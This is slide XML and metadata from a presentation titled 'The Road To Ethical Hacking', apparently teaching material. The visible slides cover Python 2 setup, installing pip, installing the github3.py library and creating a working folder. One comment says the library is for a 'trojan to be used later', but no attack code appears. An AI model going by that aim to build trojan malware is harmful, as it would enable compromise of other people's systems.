              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Python 3 is the latest version, but since version 2 has been around for a while a lot of important libraries are in version 2. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Open Command Line: Type</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Wingdings"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> python2 </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="567000" indent="-18252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exit() #to exit python</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>If you do not have python version 2, install it. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="91440" indent="-9108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Downloading libraries: (pip is a package manager) </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>sudo apt-get install python-setuptools python-pip </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="◦"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>pip install github3.py #check it works, install trojan to be used later</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Make a file in desktop and go into it. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>mkdir ~/Desktop/playground</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="201240">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>cd ~/Desktop/playground</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1253</TotalTime>
  <Application>LibreOffice/6.0.7.3$Linux_X86_64 LibreOffice_project/00m0$Build-3</Application>
  <Words>1075</Words>
  <Paragraphs>116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2018-10-13T19:16:21Z</dcterms:created>
  <dc:creator>Ramiro Gonzalez</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-17T00:59:50Z</dcterms:modified>
  <cp:revision>68</cp:revision>
  <dc:subject/>
  <dc:title>The Road To Ethical Hacking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17</vt:i4>
  </property>
</Properties>
</file>